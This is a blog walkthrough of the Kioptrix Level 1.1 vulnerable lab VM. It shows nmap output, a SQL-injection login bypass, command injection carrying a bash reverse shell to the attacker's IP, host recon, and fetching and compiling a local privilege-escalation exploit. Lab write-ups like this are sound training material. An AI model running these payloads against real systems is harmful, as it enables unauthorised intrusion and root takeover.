Kioptrix Level 1.1 Walkthrough.
Before, we begin, let's do a netdiscover to see which IP address it is connected to within our gateway.
If you have no clue on how to do this, go back to my Kioptrix Level 1 walkthrough.
In the term, type nmap -A -p- -sS 192.168.1.84
Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-03 11:48 PDT Nmap scan report for 192.168.1.84 Host is up (0.00038s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1) | 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA) |_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA) |_sshv1: Server supports SSHv1 80/tcp open http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 841/udp status |_ 100024 1 844/tcp status 443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS)) |_http-server-header: Apache/2.0.52 (CentOS) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-10-08T00:10:47 |_Not valid after: 2010-10-08T00:10:47 |_ssl-date: 2019-07-03T15:39:29+00:00; -3h09m42s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 |_ SSL2_RC4_128_WITH_MD5 631/tcp open ipp CUPS 1.1 | http-methods: |_ Potentially risky methods: PUT |_http-server-header: CUPS/1.1 |_http-title: 403 Forbidden 844/tcp open status 1 (RPC #100024) 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:9A:CB:A7 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop Host script results: |_clock-skew: mean: -3h09m42s, deviation: 0s, median: -3h09m42s TRACEROUTE HOP RTT ADDRESS 1 0.38 ms 192.168.1.84 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
After this recon, I have discovered that there is an open port at port 80 and 443. I might want to try to probe the web server.
At the login screen, I am now attempting to do a SQL Injection bypass.
admin
The password or SQL query string, which I have inputted for this to basically bypass the authentication is this:
' or 1=1 --
It worked and viola, and I am in the web portal.
This will validate whether I have command execution (injection) on the server.
The next step is to get a reverse shell using command injection on the textbox -- next to pop a reverse shell.
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.76 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::5705:19af:d9b2:5323 prefixlen 64 scopeid 0x20<link>
inet6 2001:569:79a3:1400:8454:1c30:47e9:843d prefixlen 64 scopeid 0x0<global>
First, get your localhost ip address by doing an ifconfig.
Then, ping type in the textbox like this: localhost; bash -i >& /dev/tcp/192.168.1.76/1234 0>&1
This will establish a basic reverse shell so that you can establish a connection with the victim's computer.
And, then I am in.
For now, I would want to establish some recon on the victim's machine.
I will now detect whether the machine is using RedHat by doing a:
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
I now know the version of RedHat.
Now, I would have to do a uname -a to figure out it's UNIX / Linux version.
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Now, I will also do a
bash-3.00$ cat /proc/version
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
to examine it's version in Redhat.
There might be a local privilege escalation vulnerability for CentOS in version 3.4.6-8.
Let's do a searchsploit for CentOS 4.5 to see if we can pick up anything.
Now, copy the exploit into your current directory by doing a:
cp /usr/share/exploitdb/exploits/linux/local/9542.c .
We then compile the c file by doing a:
gcc 9542.c -o privyEscalate
We then start a python HTTP server for hosting that exploit on the exploit directory.
python -m SimpleHTTPServer
Now, once you are on the victim machine, do a LHOST (your attacker IP):8000/9542.c
You would want to compile the c code on the victim machine. Usually, the only writable folder is /tmp on a victim machine, because the others only have read access.
Viola, I have rooted Kioptrix 1.2.
via GIPHY
No comments:
Post a Comment